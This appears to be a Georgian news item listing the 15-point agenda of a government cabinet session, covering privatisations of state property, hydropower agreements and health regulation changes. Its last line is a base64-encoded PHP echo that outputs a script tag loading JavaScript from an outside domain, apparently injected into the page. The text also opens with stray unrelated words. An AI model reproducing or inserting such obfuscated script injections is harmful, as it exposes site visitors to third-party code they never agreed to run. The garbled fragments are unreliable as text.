celsiusi
ავერსი შნაიდერი

დღეს, 14:00 საათზე, საქართველოს მთავრობის ადმინისტრაციაში, პრემიერ-მინისტრ ირაკლი ღარიბაშვილის ხელმძღვანელობით, მთავრობის სხდომა გაიმართება.

მთავრობის ადმინისტრაციის მიერ გავრცელებული ინფორმაციით, დღის მინისტრთა კაბინეტი წესრიგით გათვალისწინებულ 15 საკითხს განხილავს.

ეს საკითხებია:

1. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ნივთების შპს „გრანდე ჯგუფისათვის" პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

2. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ჰარმონია წყალტუბოსთვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

3. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

4. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ნივთების ფ/პ თეა იმედაძისათვის პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“ საქართველოს მთავრობის 2020 წლის 21 აგვისტოს №1630 განკარგულებაში ცვლილების შეტანისა და ფ/პ თეა იმედაძის საქმიანობის ხელშესაწყობად რიგ ღონისძიებათა განხორციელების თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

5. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ნივთის შპს „რჩეული 2021”-სათვის იჯარის უფლებით გადაცემაზე თანხმობის მიცემის შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

6. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობასა და შპს „ენ-სი ჯგუფი 2022’’-ს შორის „ურბნისის ჰესის’’ ელექტროსადგურის შესახებ დასადები ხელშეკრულების თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

7. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობასა და შპს „ენ-სი ჯგუფი 2022“-ს შორის ,,ქსანი ჰესის’’ ელექტროსადგურის შესახებ დასადები ხელშეკრულების თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

8. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობასა და შპს ,,ენ-სი ჯგუფი 2022’’-ს შორის „ქვიშხეთი ჰესის’’ ელექტროსადგურის შესახებ დასადები ხელშეკრულების თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

9. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობასა და შპს „ენ-სი ჯგუფი 2022’’-ს შორის „გომი ჰესის’’ ჰიდროელექტროსადგურის შესახებ დასადები ხელშეკრულების თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

10. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობასა და შპს „ენ-სი ჯგუფი 2022’’-ს შორის „გრაკალი ჰესის’’ ელექტროსადგურის შესახებ დასადები ხელშეკრულების თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

11. საქართველოს მთავრობის განკარგულების პროექტი „შპს „ლაღიზე“ გაცემულ სასარგებლო წიაღისეულის მოპოვების ლიცენზიაში ცვლილების შეტანის თაობაზე თანხმობის გაცემის შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

12. საქართველოს მთავრობის დადგენილების პროექტი „საყოველთაო ჯანდაცვაზე გადასვლის მიზნით გასატარებელ ზოგიერთ ღონისძიებათა შესახებ“ საქართველოს მთავრობის 2013 წლის 22 თებერვლის №36 დადგენილებაში ცვლილების შეტანის თაობაზე”, მომხსენებელი: ჯანდაცვის მინისტრი ზურაბ აზარაშვილი;

13. საქართველოს მთავრობის დადგენილების პროექტი „მაღალი რისკის შემცველი სამედიცინო საქმიანობის ტექნიკური რეგლამენტის დამტკიცების თაობაზე“ საქართველოს მთავრობის 2010 წლის 22 ნოემბრის №359 დადგენილებაში ცვლილების შეტანის შესახებ“, მომხსენებელი: ჯანდაცვის მინისტრი ზურაბ აზარაშვილი;

14. საქართველოს მთავრობის განკარგულების პროექტი „GAZELLE FUND LP-ის შეცვლილი და განახლებული შეზღუდული პარტნიორობის ხელშეკრულების ახალი რედაქციის მოწონების შესახებ”,

15. საიდუმლო 2 პროექტი

237
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");